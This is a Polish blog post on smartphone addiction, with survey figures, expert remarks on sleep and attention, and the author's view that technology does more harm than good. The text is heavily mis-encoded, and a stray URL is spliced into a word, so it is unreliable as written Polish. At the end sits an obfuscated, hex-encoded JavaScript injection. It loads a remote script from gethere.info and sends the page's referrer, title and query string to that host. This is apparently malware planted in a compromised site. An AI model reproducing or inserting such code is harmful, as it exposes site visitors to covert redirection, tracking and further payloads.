smartphone uzależnienie

UzaleA?nienie – pokolenie pochylonych gA�A?w

opublikowane w Najnowsze Wpisy, Psychologia | 0

UzaleA?nienie – zastA�pujA� nam aparat fotograficzny, budzik, dyktafon, kamerA�, a nawet ksiA�A?kA�. Korzystamy dziA�ki nim z portali spoA�ecznoA�ciowych, sA�uchamy muzyki, rozmawiamy przez Messengera czy WhatsApp, SMS-ujemy, dzielimy siA� swojA� prywatnoA�ciA� na Facebooku czy Twitterze, wstawiamy zdjA�cia na Instagramie, umawiamy siA� na randki na Tinderze, a nawet… mierzymy ciA�nienie. Na ulicach nieustannie widzimy przechodniA?w z pochylonymi gA�owami, wpatrzonych w ekrany swoich smartfonA?w. Wielu z nas nie wyobraA?a sobie juA? dnia bez telefonu. SA� one obecne w kaA?dej sferze naszego A?ycia i majA� coraz wiA�cej funkcji. Pytanie tylko, czy wiA�cej z tego poA?ytku czy nieszczA�A�A�.

smartfony uzaleAA�A?rA?dA�o: pexels.com

 

Nowoczesne technologie bez wA�tpienia zmieniajA� nasze A?ycie. Na pewno majA� wiele zalet, ale niestety psujA� kontakty miA�dzyludzkie. DoszA�o bowiem do tego, A?e sprawdzamy nasze smartfony nawet podczas spotkaA� towarzyskich. Okazuje siA�, A?e niektA?rym A�atwhttps://vimeo.com/189284870iej jest mA?wiA� o emocjach na portalach spoA�ecznoA�ciowych, niA? twarzA� w twarz. W tym celu powstaA�a caA�a gama znakA?w graficznych, ktA?re majA� oddawaA� emocje.Badania przeprowadzone przez firmA� Cisco pokazujA�, A?e 77% procent mA�odych PolakA?w czA�sto zanim wstanie z A�A?A?ka sprawdza maile, SMS-y i portale spoA�ecznoA�ciowe na swoich smartfonach. Dwie na piA�A� osA?b badanych powiedziaA�o, A?e jeA?eli pozbawiono by ich moA?liwoA�ci A�A�czenia siA� z sieciA� poprzez telefon, zaczA�liby odczuwaA� niepokA?j i przeA?ywaA� poczucie straty. JeA�li chodzi o okolicznoA�ci uA?ywania tych urzA�dzeA�, A�Pokolenie SmartfonA?w A�nie czuje granicy. SA� one bowiem uA?ywane wszA�dzie: w pracy, w szkole, w A�A?A?ku, w A�azience, podczas posiA�kA?w.A�OkoA�o dwie trzecie reprezentantA?w Pokolenia SmartfonA?w podA�wiadomie lub w sposA?b niekontrolowany zaglA�da do swoich smartfonA?w w celu sprawdzenia wiadomoA�ci mailowych, tekstowych lub mediA?w spoA�ecznoA�ciowych. Prawie 70 % respondentA?w potwierdziA�o znaczenie aplikacji mobilnych w ich codziennym A?yciu. JeA�li chodzi o cel ich pobierania, 42% badanych korzysta z nich gA�A?wnie dla gier i rozrywki, zaA� 35 % wykorzystuje je do pracy.

 

smartfony uzaleAA?rA?dA�o: pexels.com

 

 

Jak siA� objawia uzaleA?nienie?

PojawiajA� siA� problemy z koncentracjA� i ze snem, zaburzenia osobowoA�ci, obsesje, lekcewaA?enie innych osA?b. Nieustanne korzystanie z tabletA?w lub smartfonA?w powoduje brak chA�ci do nawiA�zywania interakcji z innymi ludA?mi. NajpowaA?niejszy wydaje siA� zespA?A� zaburzeA� obsesyjno-kompulsyjnych a�� pragnienie sprawdzania co chwilA� ekranu telefonu i tabletu. Dr Michael Sinclair, szef medyczny City Psychology Group tA�umaczy, A?e wielu jego pacjentA?w czuje, A?e caA�y czas musi pozostaA� online, nawet poza biurem. BojA� siA� bowiem utraty stanowiska, majA� wraA?enie, A?e A�wiat siA� zawali, jeA?eli natychmiast nie odpowiedzA� na jakA�A� wiadomoA�A�.Tacy pacjenci czujA� wibracje w telefonie nawet wA?wczas, gdy telefon jest wyA�A�czony. Ten sam niepokA?j odczuwajA�, gdy przez chwilA� sA� poza zasiA�giem sieci i nie majA� dostA�pu do Internetu. Takie przypadki wymagajA� juA? fachowego leczenia.

Sammy Margo ze Stowarzyszenia FizjoterapeutA?w w Wielkiej Brytanii zauwaA?a, A?e nasze ciaA�a nie sA� przystosowane do takich urzA�dzeA� – telefony sA� zbyt maA�e, majA� zbyt maA�e przyciski i ekrany, a koncentracja na wyA�wietlaczu smartfona moA?e skutkowaA� nieprzyjemnoA�ciami a�� od wypadkA?w na ulicy po zaburzenia rytmu dobowego.A�Eksperyment naukowcA?w z Western Washington University pokazaA�, A?e 75% osA?b uA?ywajA�cych smartfonA?w w miejscach publicznych nie zwraca A?adnej uwagi na otoczenie. Pisanie SMS-A?w czy twittowanie pochA�aniaA�o ich do tego stopnia, A?e nie zauwaA?yli przejeA?dA?ajA�cego obok jednego z naukowcA?w – przebranego za klowna rowerzysty na jednokoA�owym rowerze. Po opublikowaniu tych wynikA?w lokalne wA�adze w USA prA?bowaA�y nawet wprowadziA� zakaz uA?ywania telefonA?w komA?rkowych podczas przechodzenia przez jezdniA�. Innym powaA?nym problemem sA� zaburzenia snu. Naukowcy z Rensselaer Polytechnic Institute sprawdzili wpA�yw podA�wietlenia ekranu na produkcjA� melatoniny a�� hormonu kontrolujA�cego rytm dobowy. PrzeglA�danie wiadomoA�ci na tablecie przez mniej wiA�cej dwie godziny przed snem zmniejsza produkcjA� tej substancji o jednA� piA�tA�. To wystarczy, aby zaburzyA� rytm snu i czuwania. Im jaA�niejsze podA�wietlenie ekranu, tym silniejszy ten efekt.

Problem ten dotyka takA?e dzieci. Jestem ostatnim pokoleniem, ktA?re wychowywaA�o siA� na podwA?rku. GraA�am w klasy, w gumA�, skakaA�am na skakance, robiA�am a�zbazya�?, budowaA�am namiot z poduszek i bawiA�am siA� w dom. MojA� ulubionA� zabawkA� byA�a Barbie. AA� jak wyglA�da dzieciA�stwo dzisiaj? Ponad poA�owa PolakA?w posiada smartfona, a jedna trzecia tablet. Nie zaskakuje wiA�c fakt, A?e z tych urzA�dzeA� zaczyna korzystaA� coraz wiA�cej dzieci. WedA�ug raportu Common Sense Media, dzieci, ktA?re nie potrafiA� jeszcze mA?wiA�, bez problemu obsA�ugujA� smartfony, laptopy czy tablety. Inne badania, przeprowadzone na zlecenie firmy Life Proof, pokazujA�, A?e dwie trzecie dzieci w Wielkiej Brytanii chA�tniej bawi siA� tabletem niA? zabawkami.

 

smartfony uzaleA

A?rA?dA�o: pexels.com

 

 

Moim zdaniem dzisiejszy postA�p technologiczny przynosi nam wiA�cej szkA?d niA? korzyA�ci. ObserwujA� ludzi, ktA?rzy na spotkaniach zamiast rozmawiaA� ze sobA�, wpatrujA� siA� w ekran swoich smartfonA?w. ObserwujA� jak wspA?A�lokatorzy rozmawiajA� ze sobA� z sA�siednich pokojA?w przez Facebooka. Coraz wiA�cej osA?b z mojego otoczenia przyznaje – „jestem uzaleA?niony/uzaleA?niona”. A Wy jak uwaA?acie? Czy wedA�ug Was rozwA?j technologiiA�przynosi wiA�cej problemA?w w spoA�eczeA�stwie czy korzyA�ci? UzaleA?nienie?

 

Kapelusze, toczki, stroiki tworzone z pasji!!!


 

 var _0xb322=[„\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}